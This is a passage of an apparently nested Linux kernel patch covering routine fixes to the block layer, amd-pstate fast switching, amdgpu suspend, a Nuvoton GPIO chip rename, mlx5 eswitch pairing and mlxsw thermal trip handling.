+-	if (rq->cmd_flags & REQ_POLLED) {
++	if (rq->cmd_flags & REQ_POLLED && (nr_vecs <= BIO_INLINE_VECS)) {
+ 		blk_opf_t opf = rq->cmd_flags | REQ_ALLOC_CACHE;
+ 
+ 		bio = bio_alloc_bioset(NULL, nr_vecs, opf, gfp_mask,
+diff --git a/block/blk-mq-tag.c b/block/blk-mq-tag.c
+index 9eb968e14d31f..a80d7c62bdfe6 100644
+--- a/block/blk-mq-tag.c
++++ b/block/blk-mq-tag.c
+@@ -41,16 +41,20 @@ void __blk_mq_tag_busy(struct blk_mq_hw_ctx *hctx)
+ {
+ 	unsigned int users;
+ 
++	/*
++	 * calling test_bit() prior to test_and_set_bit() is intentional,
++	 * it avoids dirtying the cacheline if the queue is already active.
++	 */
+ 	if (blk_mq_is_shared_tags(hctx->flags)) {
+ 		struct request_queue *q = hctx->queue;
+ 
+-		if (test_bit(QUEUE_FLAG_HCTX_ACTIVE, &q->queue_flags))
++		if (test_bit(QUEUE_FLAG_HCTX_ACTIVE, &q->queue_flags) ||
++		    test_and_set_bit(QUEUE_FLAG_HCTX_ACTIVE, &q->queue_flags))
+ 			return;
+-		set_bit(QUEUE_FLAG_HCTX_ACTIVE, &q->queue_flags);
+ 	} else {
+-		if (test_bit(BLK_MQ_S_TAG_ACTIVE, &hctx->state))
++		if (test_bit(BLK_MQ_S_TAG_ACTIVE, &hctx->state) ||
++		    test_and_set_bit(BLK_MQ_S_TAG_ACTIVE, &hctx->state))
+ 			return;
+-		set_bit(BLK_MQ_S_TAG_ACTIVE, &hctx->state);
+ 	}
+ 
+ 	users = atomic_inc_return(&hctx->tags->active_queues);
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index c17bd845f5fcb..f8d2bba9173d8 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -249,9 +249,8 @@ static int amd_pstate_verify(struct cpufreq_policy_data *policy)
+ 	return 0;
+ }
+ 
+-static int amd_pstate_target(struct cpufreq_policy *policy,
+-			     unsigned int target_freq,
+-			     unsigned int relation)
++static int amd_pstate_update_freq(struct cpufreq_policy *policy,
++				  unsigned int target_freq, bool fast_switch)
+ {
+ 	struct cpufreq_freqs freqs;
+ 	struct amd_cpudata *cpudata = policy->driver_data;
+@@ -270,26 +269,50 @@ static int amd_pstate_target(struct cpufreq_policy *policy,
+ 	des_perf = DIV_ROUND_CLOSEST(target_freq * cap_perf,
+ 				     cpudata->max_freq);
+ 
+-	cpufreq_freq_transition_begin(policy, &freqs);
+-	amd_pstate_update(cpudata, min_perf, des_perf,
+-			  max_perf, false);
+-	cpufreq_freq_transition_end(policy, &freqs, false);
++	WARN_ON(fast_switch && !policy->fast_switch_enabled);
++	/*
++	 * If fast_switch is desired, then there aren't any registered
++	 * transition notifiers. See comment for
++	 * cpufreq_enable_fast_switch().
++	 */
++	if (!fast_switch)
++		cpufreq_freq_transition_begin(policy, &freqs);
++
++	amd_pstate_update(cpudata, min_perf, des_perf, max_perf, fast_switch);
++
++	if (!fast_switch)
++		cpufreq_freq_transition_end(policy, &freqs, false);
+ 
+ 	return 0;
+ }
+ 
++static int amd_pstate_target(struct cpufreq_policy *policy,
++			     unsigned int target_freq,
++			     unsigned int relation)
++{
++	return amd_pstate_update_freq(policy, target_freq, false);
++}
++
++static unsigned int amd_pstate_fast_switch(struct cpufreq_policy *policy,
++				  unsigned int target_freq)
++{
++	return amd_pstate_update_freq(policy, target_freq, true);
++}
++
+ static void amd_pstate_adjust_perf(unsigned int cpu,
+ 				   unsigned long _min_perf,
+ 				   unsigned long target_perf,
+ 				   unsigned long capacity)
+ {
+ 	unsigned long max_perf, min_perf, des_perf,
+-		      cap_perf, lowest_nonlinear_perf;
++		      cap_perf, lowest_nonlinear_perf, max_freq;
+ 	struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
+ 	struct amd_cpudata *cpudata = policy->driver_data;
++	unsigned int target_freq;
+ 
+ 	cap_perf = READ_ONCE(cpudata->highest_perf);
+ 	lowest_nonlinear_perf = READ_ONCE(cpudata->lowest_nonlinear_perf);
++	max_freq = READ_ONCE(cpudata->max_freq);
+ 
+ 	des_perf = cap_perf;
+ 	if (target_perf < capacity)
+@@ -306,6 +329,10 @@ static void amd_pstate_adjust_perf(unsigned int cpu,
+ 	if (max_perf < min_perf)
+ 		max_perf = min_perf;
+ 
++	des_perf = clamp_t(unsigned long, des_perf, min_perf, max_perf);
++	target_freq = div_u64(des_perf * max_freq, max_perf);
++	policy->cur = target_freq;
++
+ 	amd_pstate_update(cpudata, min_perf, des_perf, max_perf, true);
+ 	cpufreq_cpu_put(policy);
+ }
+@@ -517,6 +544,7 @@ static int amd_pstate_cpu_exit(struct cpufreq_policy *policy)
+ 
+ 	freq_qos_remove_request(&cpudata->req[1]);
+ 	freq_qos_remove_request(&cpudata->req[0]);
++	policy->fast_switch_possible = false;
+ 	kfree(cpudata);
+ 
+ 	return 0;
+@@ -608,6 +636,7 @@ static struct cpufreq_driver amd_pstate_driver = {
+ 	.flags		= CPUFREQ_CONST_LOOPS | CPUFREQ_NEED_UPDATE_LIMITS,
+ 	.verify		= amd_pstate_verify,
+ 	.target		= amd_pstate_target,
++	.fast_switch    = amd_pstate_fast_switch,
+ 	.init		= amd_pstate_cpu_init,
+ 	.exit		= amd_pstate_cpu_exit,
+ 	.suspend	= amd_pstate_cpu_suspend,
+diff --git a/drivers/firmware/arm_ffa/driver.c b/drivers/firmware/arm_ffa/driver.c
+index 737f36e7a9035..5904a679d3512 100644
+--- a/drivers/firmware/arm_ffa/driver.c
++++ b/drivers/firmware/arm_ffa/driver.c
+@@ -274,7 +274,8 @@ __ffa_partition_info_get(u32 uuid0, u32 uuid1, u32 uuid2, u32 uuid3,
+ 	int idx, count, flags = 0, sz, buf_sz;
+ 	ffa_value_t partition_info;
+ 
+-	if (!buffer || !num_partitions) /* Just get the count for now */
++	if (drv_info->version > FFA_VERSION_1_0 &&
++	    (!buffer || !num_partitions)) /* Just get the count for now */
+ 		flags = PARTITION_INFO_GET_RETURN_COUNT_ONLY;
+ 
+ 	mutex_lock(&drv_info->rx_lock);
+diff --git a/drivers/gpio/Kconfig b/drivers/gpio/Kconfig
+index e3af86f06c630..3e8e5f4ffa59f 100644
+--- a/drivers/gpio/Kconfig
++++ b/drivers/gpio/Kconfig
+@@ -882,7 +882,7 @@ config GPIO_F7188X
+ 	help
+ 	  This option enables support for GPIOs found on Fintek Super-I/O
+ 	  chips F71869, F71869A, F71882FG, F71889F and F81866.
+-	  As well as Nuvoton Super-I/O chip NCT6116D.
++	  As well as Nuvoton Super-I/O chip NCT6126D.
+ 
+ 	  To compile this driver as a module, choose M here: the module will
+ 	  be called f7188x-gpio.
+diff --git a/drivers/gpio/gpio-f7188x.c b/drivers/gpio/gpio-f7188x.c
+index 9effa7769bef5..f54ca5a1775ea 100644
+--- a/drivers/gpio/gpio-f7188x.c
++++ b/drivers/gpio/gpio-f7188x.c
+@@ -48,7 +48,7 @@
+ /*
+  * Nuvoton devices.
+  */
+-#define SIO_NCT6116D_ID		0xD283  /* NCT6116D chipset ID */
++#define SIO_NCT6126D_ID		0xD283  /* NCT6126D chipset ID */
+ 
+ #define SIO_LD_GPIO_NUVOTON	0x07	/* GPIO logical device */
+ 
+@@ -62,7 +62,7 @@ enum chips {
+ 	f81866,
+ 	f81804,
+ 	f81865,
+-	nct6116d,
++	nct6126d,
+ };
+ 
+ static const char * const f7188x_names[] = {
+@@ -74,7 +74,7 @@ static const char * const f7188x_names[] = {
+ 	"f81866",
+ 	"f81804",
+ 	"f81865",
+-	"nct6116d",
++	"nct6126d",
+ };
+ 
+ struct f7188x_sio {
+@@ -187,8 +187,8 @@ static int f7188x_gpio_set_config(struct gpio_chip *chip, unsigned offset,
+ /* Output mode register (0:open drain 1:push-pull). */
+ #define f7188x_gpio_out_mode(base) ((base) + 3)
+ 
+-#define f7188x_gpio_dir_invert(type)	((type) == nct6116d)
+-#define f7188x_gpio_data_single(type)	((type) == nct6116d)
++#define f7188x_gpio_dir_invert(type)	((type) == nct6126d)
++#define f7188x_gpio_data_single(type)	((type) == nct6126d)
+ 
+ static struct f7188x_gpio_bank f71869_gpio_bank[] = {
+ 	F7188X_GPIO_BANK(0, 6, 0xF0, DRVNAME "-0"),
+@@ -274,7 +274,7 @@ static struct f7188x_gpio_bank f81865_gpio_bank[] = {
+ 	F7188X_GPIO_BANK(60, 5, 0x90, DRVNAME "-6"),
+ };
+ 
+-static struct f7188x_gpio_bank nct6116d_gpio_bank[] = {
++static struct f7188x_gpio_bank nct6126d_gpio_bank[] = {
+ 	F7188X_GPIO_BANK(0, 8, 0xE0, DRVNAME "-0"),
+ 	F7188X_GPIO_BANK(10, 8, 0xE4, DRVNAME "-1"),
+ 	F7188X_GPIO_BANK(20, 8, 0xE8, DRVNAME "-2"),
+@@ -282,7 +282,7 @@ static struct f7188x_gpio_bank nct6116d_gpio_bank[] = {
+ 	F7188X_GPIO_BANK(40, 8, 0xF0, DRVNAME "-4"),
+ 	F7188X_GPIO_BANK(50, 8, 0xF4, DRVNAME "-5"),
+ 	F7188X_GPIO_BANK(60, 8, 0xF8, DRVNAME "-6"),
+-	F7188X_GPIO_BANK(70, 1, 0xFC, DRVNAME "-7"),
++	F7188X_GPIO_BANK(70, 8, 0xFC, DRVNAME "-7"),
+ };
+ 
+ static int f7188x_gpio_get_direction(struct gpio_chip *chip, unsigned offset)
+@@ -490,9 +490,9 @@ static int f7188x_gpio_probe(struct platform_device *pdev)
+ 		data->nr_bank = ARRAY_SIZE(f81865_gpio_bank);
+ 		data->bank = f81865_gpio_bank;
+ 		break;
+-	case nct6116d:
+-		data->nr_bank = ARRAY_SIZE(nct6116d_gpio_bank);
+-		data->bank = nct6116d_gpio_bank;
++	case nct6126d:
++		data->nr_bank = ARRAY_SIZE(nct6126d_gpio_bank);
++		data->bank = nct6126d_gpio_bank;
+ 		break;
+ 	default:
+ 		return -ENODEV;
+@@ -559,9 +559,9 @@ static int __init f7188x_find(int addr, struct f7188x_sio *sio)
+ 	case SIO_F81865_ID:
+ 		sio->type = f81865;
+ 		break;
+-	case SIO_NCT6116D_ID:
++	case SIO_NCT6126D_ID:
+ 		sio->device = SIO_LD_GPIO_NUVOTON;
+-		sio->type = nct6116d;
++		sio->type = nct6126d;
+ 		break;
+ 	default:
+ 		pr_info("Unsupported Fintek device 0x%04x\n", devid);
+@@ -569,7 +569,7 @@ static int __init f7188x_find(int addr, struct f7188x_sio *sio)
+ 	}
+ 
+ 	/* double check manufacturer where possible */
+-	if (sio->type != nct6116d) {
++	if (sio->type != nct6126d) {
+ 		manid = superio_inw(addr, SIO_FINTEK_MANID);
+ 		if (manid != SIO_FINTEK_ID) {
+ 			pr_debug("Not a Fintek device at 0x%08x\n", addr);
+@@ -581,7 +581,7 @@ static int __init f7188x_find(int addr, struct f7188x_sio *sio)
+ 	err = 0;
+ 
+ 	pr_info("Found %s at %#x\n", f7188x_names[sio->type], (unsigned int)addr);
+-	if (sio->type != nct6116d)
++	if (sio->type != nct6126d)
+ 		pr_info("   revision %d\n", superio_inb(addr, SIO_FINTEK_DEVREV));
+ 
+ err:
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+index a78e80f9f65cd..e32bd990800de 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+@@ -1083,6 +1083,9 @@ bool amdgpu_acpi_is_s0ix_active(struct amdgpu_device *adev)
+ 	    (pm_suspend_target_state != PM_SUSPEND_TO_IDLE))
+ 		return false;
+ 
++	if (adev->asic_type < CHIP_RAVEN)
++		return false;
++
+ 	/*
+ 	 * If ACPI_FADT_LOW_POWER_S0 is not set in the FADT, it is generally
+ 	 * risky to do any special firmware-related preparations for entering
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 871f481f84328..88a9ece7f4647 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2402,8 +2402,10 @@ static int amdgpu_pmops_suspend(struct device *dev)
+ 
+ 	if (amdgpu_acpi_is_s0ix_active(adev))
+ 		adev->in_s0ix = true;
+-	else
++	else if (amdgpu_acpi_is_s3_active(adev))
+ 		adev->in_s3 = true;
++	if (!adev->in_s0ix && !adev->in_s3)
++		return 0;
+ 	return amdgpu_device_suspend(drm_dev, true);
+ }
+ 
+@@ -2424,6 +2426,9 @@ static int amdgpu_pmops_resume(struct device *dev)
+ 	struct amdgpu_device *adev = drm_to_adev(drm_dev);
+ 	int r;
+ 
++	if (!adev->in_s0ix && !adev->in_s3)
++		return 0;
++
+ 	/* Avoids registers access if device is physically gone */
+ 	if (!pci_device_is_present(adev->pdev))
+ 		adev->no_hw_access = true;
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index e459fb542b83a..1f6e006c51c4a 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -792,8 +792,11 @@ static void rxe_qp_do_cleanup(struct work_struct *work)
+ 		del_timer_sync(&qp->rnr_nak_timer);
+ 	}
+ 
+-	rxe_cleanup_task(&qp->req.task);
+-	rxe_cleanup_task(&qp->comp.task);
++	if (qp->req.task.func)
++		rxe_cleanup_task(&qp->req.task);
++
++	if (qp->comp.task.func)
++		rxe_cleanup_task(&qp->comp.task);
+ 
+ 	/* flush out any receive wr's or pending requests */
+ 	if (qp->req.task.func)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index 8fdd3afe59981..afdddfced7e69 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -1225,6 +1225,14 @@ static inline void link_status_user_format(u64 lstat,
+ 	linfo->an = FIELD_GET(RESP_LINKSTAT_AN, lstat);
+ 	linfo->fec = FIELD_GET(RESP_LINKSTAT_FEC, lstat);
+ 	linfo->lmac_type_id = cgx_get_lmac_type(cgx, lmac_id);
++
++	if (linfo->lmac_type_id >= LMAC_MODE_MAX) {
++		dev_err(&cgx->pdev->dev, "Unknown lmac_type_id %d reported by firmware on cgx port%d:%d",
++			linfo->lmac_type_id, cgx->cgx_id, lmac_id);
++		strncpy(linfo->lmac_type, "Unknown", LMACTYPE_STR_LEN - 1);
++		return;
++	}
++
+ 	lmac_string = cgx_lmactype_string[linfo->lmac_type_id];
+ 	strncpy(linfo->lmac_type, lmac_string, LMACTYPE_STR_LEN - 1);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+index 821c78bab3732..a3daca44f74b1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+@@ -340,6 +340,7 @@ struct mlx5_eswitch {
+ 	}  params;
+ 	struct blocking_notifier_head n_head;
+ 	struct dentry *dbgfs;
++	bool paired[MLX5_MAX_PORTS];
+ };
+ 
+ void esw_offloads_disable(struct mlx5_eswitch *esw);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 5235b5a7b9637..433cdd0a2cf34 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -2827,6 +2827,9 @@ static int mlx5_esw_offloads_devcom_event(int event,
+ 		    mlx5_eswitch_vport_match_metadata_enabled(peer_esw))
+ 			break;
+ 
++		if (esw->paired[mlx5_get_dev_index(peer_esw->dev)])
++			break;
++
+ 		err = mlx5_esw_offloads_set_ns_peer(esw, peer_esw, true);
+ 		if (err)
+ 			goto err_out;
+@@ -2838,14 +2841,18 @@ static int mlx5_esw_offloads_devcom_event(int event,
+ 		if (err)
+ 			goto err_pair;
+ 
++		esw->paired[mlx5_get_dev_index(peer_esw->dev)] = true;
++		peer_esw->paired[mlx5_get_dev_index(esw->dev)] = true;
+ 		mlx5_devcom_set_paired(devcom, MLX5_DEVCOM_ESW_OFFLOADS, true);
+ 		break;
+ 
+ 	case ESW_OFFLOADS_DEVCOM_UNPAIR:
+-		if (!mlx5_devcom_is_paired(devcom, MLX5_DEVCOM_ESW_OFFLOADS))
++		if (!esw->paired[mlx5_get_dev_index(peer_esw->dev)])
+ 			break;
+ 
+ 		mlx5_devcom_set_paired(devcom, MLX5_DEVCOM_ESW_OFFLOADS, false);
++		esw->paired[mlx5_get_dev_index(peer_esw->dev)] = false;
++		peer_esw->paired[mlx5_get_dev_index(esw->dev)] = false;
+ 		mlx5_esw_offloads_unpair(peer_esw);
+ 		mlx5_esw_offloads_unpair(esw);
+ 		mlx5_esw_offloads_set_ns_peer(esw, peer_esw, false);
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+index 09ed6e5fa6c34..ef5e61708df39 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+@@ -36,39 +36,33 @@ enum mlxsw_thermal_trips {
+ 	MLXSW_THERMAL_TEMP_TRIP_HOT,
+ };
+ 
+-struct mlxsw_cooling_states {
++struct mlxsw_thermal_trip {
++	int	type;
++	int	temp;
++	int	hyst;
+ 	int	min_state;
+ 	int	max_state;
+ };
+ 
+-static const struct thermal_trip default_thermal_trips[] = {
++static const struct mlxsw_thermal_trip default_thermal_trips[] = {
+ 	{	/* In range - 0-40% PWM */
+ 		.type		= THERMAL_TRIP_ACTIVE,
+-		.temperature	= MLXSW_THERMAL_ASIC_TEMP_NORM,
+-		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-	},
+-	{
+-		/* In range - 40-100% PWM */
+-		.type		= THERMAL_TRIP_ACTIVE,
+-		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HIGH,
+-		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-	},
+-	{	/* Warning */
+-		.type		= THERMAL_TRIP_HOT,
+-		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HOT,
+-	},
+-};
+-
+-static const struct mlxsw_cooling_states default_cooling_states[] = {
+-	{
++		.temp		= MLXSW_THERMAL_ASIC_TEMP_NORM,
++		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 		.min_state	= 0,
+ 		.max_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
+ 	},
+ 	{
++		/* In range - 40-100% PWM */
++		.type		= THERMAL_TRIP_ACTIVE,
++		.temp		= MLXSW_THERMAL_ASIC_TEMP_HIGH,
++		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 		.min_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
+ 		.max_state	= MLXSW_THERMAL_MAX_STATE,
+ 	},
+-	{
++	{	/* Warning */
++		.type		= THERMAL_TRIP_HOT,
++		.temp		= MLXSW_THERMAL_ASIC_TEMP_HOT,
+ 		.min_state	= MLXSW_THERMAL_MAX_STATE,
+ 		.max_state	= MLXSW_THERMAL_MAX_STATE,
+ 	},
+@@ -84,8 +78,7 @@ struct mlxsw_thermal;
+ struct mlxsw_thermal_module {
+ 	struct mlxsw_thermal *parent;
+ 	struct thermal_zone_device *tzdev;
+-	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
+-	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
+ 	int module; /* Module or gearbox number */
+ 	u8 slot_index;
+ };
+@@ -105,8 +98,7 @@ struct mlxsw_thermal {
+ 	struct thermal_zone_device *tzdev;
+ 	int polling_delay;
+ 	struct thermal_cooling_device *cdevs[MLXSW_MFCR_PWMS_MAX];
+-	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
+-	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
+ 	struct mlxsw_thermal_area line_cards[];
+ };
+ 
+@@ -143,9 +135,9 @@ static int mlxsw_get_cooling_device_idx(struct mlxsw_thermal *thermal,
+ static void
+ mlxsw_thermal_module_trips_reset(struct mlxsw_thermal_module *tz)
+ {
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = 0;
+ }
+ 
+ static int
+@@ -187,12 +179,12 @@ mlxsw_thermal_module_trips_update(struct device *dev, struct mlxsw_core *core,
+ 	 * by subtracting double hysteresis value.
+ 	 */
+ 	if (crit_temp >= MLXSW_THERMAL_MODULE_TEMP_SHIFT)
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp -
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp -
+ 					MLXSW_THERMAL_MODULE_TEMP_SHIFT;
+ 	else
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = emerg_temp;
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = emerg_temp;
+ 
+ 	return 0;
+ }
+@@ -209,11 +201,11 @@ static int mlxsw_thermal_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_cooling_states *state = &thermal->cooling_states[i];
++		const struct mlxsw_thermal_trip *trip = &thermal->trips[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       state->max_state,
+-						       state->min_state,
++						       trip->max_state,
++						       trip->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0) {
+ 			dev_err(dev, "Failed to bind cooling device to trip %d\n", i);
+@@ -267,6 +259,61 @@ static int mlxsw_thermal_get_temp(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
++static int mlxsw_thermal_get_trip_type(struct thermal_zone_device *tzdev,
++				       int trip,
++				       enum thermal_trip_type *p_type)
++{
++	struct mlxsw_thermal *thermal = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	*p_type = thermal->trips[trip].type;
++	return 0;
++}
++
++static int mlxsw_thermal_get_trip_temp(struct thermal_zone_device *tzdev,
++				       int trip, int *p_temp)
++{
++	struct mlxsw_thermal *thermal = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	*p_temp = thermal->trips[trip].temp;
++	return 0;
++}
++
++static int mlxsw_thermal_set_trip_temp(struct thermal_zone_device *tzdev,
++				       int trip, int temp)
++{
++	struct mlxsw_thermal *thermal = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	thermal->trips[trip].temp = temp;
++	return 0;
++}
++
++static int mlxsw_thermal_get_trip_hyst(struct thermal_zone_device *tzdev,
++				       int trip, int *p_hyst)
++{
++	struct mlxsw_thermal *thermal = tzdev->devdata;
++
++	*p_hyst = thermal->trips[trip].hyst;
++	return 0;
++}
++
++static int mlxsw_thermal_set_trip_hyst(struct thermal_zone_device *tzdev,
++				       int trip, int hyst)
++{
++	struct mlxsw_thermal *thermal = tzdev->devdata;
++
++	thermal->trips[trip].hyst = hyst;
++	return 0;
++}
++
+ static struct thermal_zone_params mlxsw_thermal_params = {
+ 	.no_hwmon = true,
+ };
+@@ -275,6 +322,11 @@ static struct thermal_zone_device_ops mlxsw_thermal_ops = {
+ 	.bind = mlxsw_thermal_bind,
+ 	.unbind = mlxsw_thermal_unbind,
+ 	.get_temp = mlxsw_thermal_get_temp,
++	.get_trip_type	= mlxsw_thermal_get_trip_type,
++	.get_trip_temp	= mlxsw_thermal_get_trip_temp,
++	.set_trip_temp	= mlxsw_thermal_set_trip_temp,
++	.get_trip_hyst	= mlxsw_thermal_get_trip_hyst,
++	.set_trip_hyst	= mlxsw_thermal_set_trip_hyst,
+ };
+ 
+ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+@@ -289,11 +341,11 @@ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_cooling_states *state = &tz->cooling_states[i];
++		const struct mlxsw_thermal_trip *trip = &tz->trips[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       state->max_state,
+-						       state->min_state,
++						       trip->max_state,
++						       trip->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0)
+ 			goto err_thermal_zone_bind_cooling_device;
+@@ -381,10 +433,74 @@ static int mlxsw_thermal_module_temp_get(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
++static int
++mlxsw_thermal_module_trip_type_get(struct thermal_zone_device *tzdev, int trip,
++				   enum thermal_trip_type *p_type)
++{
++	struct mlxsw_thermal_module *tz = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	*p_type = tz->trips[trip].type;
++	return 0;
++}
++
++static int
++mlxsw_thermal_module_trip_temp_get(struct thermal_zone_device *tzdev,
++				   int trip, int *p_temp)
++{
++	struct mlxsw_thermal_module *tz = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	*p_temp = tz->trips[trip].temp;
++	return 0;
++}
++
++static int
++mlxsw_thermal_module_trip_temp_set(struct thermal_zone_device *tzdev,
++				   int trip, int temp)
++{
++	struct mlxsw_thermal_module *tz = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	tz->trips[trip].temp = temp;
++	return 0;
++}
++
++static int
++mlxsw_thermal_module_trip_hyst_get(struct thermal_zone_device *tzdev, int trip,
++				   int *p_hyst)
++{
++	struct mlxsw_thermal_module *tz = tzdev->devdata;
++
++	*p_hyst = tz->trips[trip].hyst;
++	return 0;
++}
++
++static int
++mlxsw_thermal_module_trip_hyst_set(struct thermal_zone_device *tzdev, int trip,
++				   int hyst)
++{
++	struct mlxsw_thermal_module *tz = tzdev->devdata;
++
++	tz->trips[trip].hyst = hyst;
++	return 0;
++}
++
+ static struct thermal_zone_device_ops mlxsw_thermal_module_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
+ 	.get_temp	= mlxsw_thermal_module_temp_get,
++	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
++	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
++	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
++	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
++	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_gearbox_temp_get(struct thermal_zone_device *tzdev,
+@@ -414,6 +530,11 @@ static struct thermal_zone_device_ops mlxsw_thermal_gearbox_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
+ 	.get_temp	= mlxsw_thermal_gearbox_temp_get,
++	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
++	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
++	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
++	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
++	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_get_max_state(struct thermal_cooling_device *cdev,
+@@ -495,8 +616,7 @@ mlxsw_thermal_module_tz_init(struct mlxsw_thermal_module *module_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-module%d",
+ 			 module_tz->module + 1);
+-	module_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
+-							module_tz->trips,
++	module_tz->tzdev = thermal_zone_device_register(tz_name,
+ 							MLXSW_THERMAL_NUM_TRIPS,
+ 							MLXSW_THERMAL_TRIP_MASK,
+ 							module_tz,
